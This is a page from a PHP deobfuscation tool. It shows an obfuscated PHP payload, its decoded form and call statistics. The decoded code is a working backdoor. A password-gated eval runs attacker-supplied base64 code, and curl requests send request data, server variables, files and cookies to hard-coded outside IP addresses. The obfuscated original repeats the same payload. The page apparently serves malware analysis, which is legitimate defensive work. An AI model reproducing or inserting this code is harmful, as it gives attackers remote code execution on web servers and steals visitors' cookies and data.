Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$n0c8e="zdZ91hLpeb7QG0TjalMDCnu3okEmXIgPVYr5NUHcf2OK4AswxSiWtFRqv_6ByJ8";$x1ac=$n0c8e[40]...
Decoded Output download
if
(
isset ($_POST[product_id]) &&
md5(
$_POST[product_id] )
==="7624e600e055e1676a7a0728f0051c69"
)
{ eval( base64_decode(
$_POST[image_id]) );
exit(); };
$ar=["aHR0cHM6Ly8xMDYuMTUuMTc5LjI1NQ==","aHR0cHM6Ly8xMDMuMTM5LjExMy4xNA==","aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
if(isset($_POST['prod_hash'])){
foreach ($ar as $v){
$array = array(
'statistics_hash' => $_POST['prod_hash'],
'ua' => $_SERVER['HTTP_USER_AGENT'],
'cl_ip' => $_SERVER['REMOTE_ADDR']
);
$ch = curl_init(base64_decode($v));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$html = curl_exec($ch);
curl_close($ch);
unset($_POST['prod_hash']);
$_POST = array_values($_POST);
}
}
$q=[
"#(select|insert|update).+?from.+?(employee|admin_user|oc_user)#is",
"#select.+into.+\@.+\;.+prepare.+\@#is",
"#insert.+into.+values#is",
"#update.+set.+where.+\=#is",
"#\<\?php#is",
"#file_put_contents[\( ]+#is",
"#select.+sleep\(.+\)#is",
];
$f=json_encode($_REQUEST).json_encode($_FILES).json_encode($_COOKIE);
$ff=json_encode($_REQUEST).json_encode($_SERVER).json_encode($_FILES).json_encode($_COOKIE);
$l=strtolower($f);
foreach($q as $u){
if(PREg_MaTch($u,$l)){
$ar=["aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
foreach ($ar as $v){
$array = array(
'product' => base64_encode($ff),
);
$ch = curl_init(base64_decode($v));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$html = curl_exec($ch);
curl_close($ch);
}
$_REQUEST = array();
$_GET = array();
$_POST = array();
$_COOKIE = array();
}
}
Did this file decode correctly?
Original Code
$n0c8e="zdZ91hLpeb7QG0TjalMDCnu3okEmXIgPVYr5NUHcf2OK4AswxSiWtFRqv_6ByJ8";$x1ac=$n0c8e[40].$n0c8e[22].$n0c8e[21].$n0c8e[39].$n0c8e[52].$n0c8e[50].$n0c8e[24].$n0c8e[21].$n0c8e[57].$n0c8e[8].$n0c8e[48].$n0c8e[50].$n0c8e[46].$n0c8e[52].$n0c8e[46];$gf0=$n0c8e[39].$n0c8e[34].$n0c8e[8].$n0c8e[16].$n0c8e[52].$n0c8e[8].$n0c8e[57].$n0c8e[40].$n0c8e[22].$n0c8e[21].$n0c8e[39].$n0c8e[52].$n0c8e[50].$n0c8e[24].$n0c8e[21];$r0c5=$n0c8e[9].$n0c8e[16].$n0c8e[46].$n0c8e[8].$n0c8e[58].$n0c8e[44].$n0c8e[57].$n0c8e[1].$n0c8e[8].$n0c8e[39].$n0c8e[24].$n0c8e[1].$n0c8e[8];if(@$x1ac($gf0)){$t14 = @$gf0('', @$r0c5('aWYKCSgKIGlzc2V0ICAoJF9QT1NUW3Byb2R1Y3RfaWRdKSAmJiAKIG1kNSgKICRfUE9TVFtwcm9kdWN0X2lkXSApCj09PSI3NjI0ZTYwMGUwNTVlMTY3NmE3YTA3MjhmMDA1MWM2OSIKCikKCnsJZXZhbCgJCWJhc2U2NF9kZWNvZGUoCiAkX1BPU1RbaW1hZ2VfaWRdKSApOwoJZXhpdCgpOwl9OwoKJGFyPVsiYUhSMGNITTZMeTh4TURZdU1UVXVNVGM1TGpJMU5RPT0iLCJhSFIwY0hNNkx5OHhNRE11TVRNNUxqRXhNeTR4TkE9PSIsImFIUjBjSE02THk4ME55NHhNREV1TVRrMUxqazQiXTsKaWYoaXNzZXQoJF9QT1NUWydwcm9kX2hhc2gnXSkpewogICAgZm9yZWFjaCAoJGFyIGFzICR2KXsKICAgICAgICAkYXJyYXkgPSBhcnJheSgKICAgICAgICAgICAgICAgICAgICAgICAgJ3N0YXRpc3RpY3NfaGFzaCcgICA9PiAkX1BPU1RbJ3Byb2RfaGFzaCddLAogICAgICAgICAgICAgICAgICAgICAgICAndWEnID0+ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwKICAgICAgICAgICAgICAgICAgICAgICAgJ2NsX2lwJyA9PiAkX1NFUlZFUlsnUkVNT1RFX0FERFInXQoKICAgICAgICAgICAgICAgICAgICApOwogICAgICAgICRjaCA9IGN1cmxfaW5pdChiYXNlNjRfZGVjb2RlKCR2KSk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1QsIDEpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMCk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1RJTUVPVVQsIDMpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9QT1NURklFTERTLCAkYXJyYXkpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgdHJ1ZSk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCwgZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOwogICAgICAgICRodG1sID0gY3VybF9leGVjKCRjaCk7CiAgICAgICAgY3VybF9jbG9zZSgkY2gpOwogICAgICAgIHVuc2V0KCRfUE9TVFsncHJvZF9oYXNoJ10pOwogICAgICAgICRfUE9TVCA9IGFycmF5X3ZhbHVlcygkX1BPU1QpOwogICAgfQp9CgokcT1bCgkiIyhzZWxlY3R8aW5zZXJ0fHVwZGF0ZSkuKz9mcm9tLis/KGVtcGxveWVlfGFkbWluX3VzZXJ8b2NfdXNlcikjaXMiLAoJIiNzZWxlY3QuK2ludG8uK1xALitcOy4rcHJlcGFyZS4rXEAjaXMiLAoJIiNpbnNlcnQuK2ludG8uK3ZhbHVlcyNpcyIsCgkiI3VwZGF0ZS4rc2V0Lit3aGVyZS4rXD0jaXMiLAoJIiNcPFw/cGhwI2lzIiwKCSIjZmlsZV9wdXRfY29udGVudHNbXCggXHRdKyNpcyIsCgkiI3NlbGVjdC4rc2xlZXBcKC4rXCkjaXMiLApdOwoKCiRmPWpzb25fZW5jb2RlKCRfUkVRVUVTVCkuanNvbl9lbmNvZGUoJF9GSUxFUykuanNvbl9lbmNvZGUoJF9DT09LSUUpOwokZmY9anNvbl9lbmNvZGUoJF9SRVFVRVNUKS5qc29uX2VuY29kZSgkX1NFUlZFUikuanNvbl9lbmNvZGUoJF9GSUxFUykuanNvbl9lbmNvZGUoJF9DT09LSUUpOwokbD1zdHJ0b2xvd2VyKCRmKTsKCmZvcmVhY2goJHEgYXMgJHUpewoJaWYoUFJFZ19NYVRjaCgkdSwkbCkpewoKCgoJCSRhcj1bImFIUjBjSE02THk4ME55NHhNREV1TVRrMUxqazQiXTsKCSAgICBmb3JlYWNoICgkYXIgYXMgJHYpewoJICAgICAgICAkYXJyYXkgPSBhcnJheSgKCSAgICAgICAgICAgICAgICAgICAgICAgICdwcm9kdWN0JyAgID0+IGJhc2U2NF9lbmNvZGUoJGZmKSwKCSAgICAgICAgICAgICAgICAgICAgKTsKCSAgICAgICAgJGNoID0gY3VybF9pbml0KGJhc2U2NF9kZWNvZGUoJHYpKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1QsIDEpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDApOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMyk7CgkgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9QT1NURklFTERTLCAkYXJyYXkpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIGZhbHNlKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgZmFsc2UpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsIGZhbHNlKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgkgICAgICAgICRodG1sID0gY3VybF9leGVjKCRjaCk7CgkgICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKCSAgICB9CgkJJF9SRVFVRVNUID0gYXJyYXkoKTsKCQkkX0dFVCA9IGFycmF5KCk7CgkJJF9QT1NUID0gYXJyYXkoKTsKCQkkX0NPT0tJRSA9IGFycmF5KCk7Cgl9Cn0='));@$t14();}
Function Calls
base64_decode | 1 |
create_function | 1 |
function_exists | 1 |
Stats
MD5 | f4e08c98d6b203a85857327b502a3055 |
Eval Count | 1 |
Decode Time | 321 ms |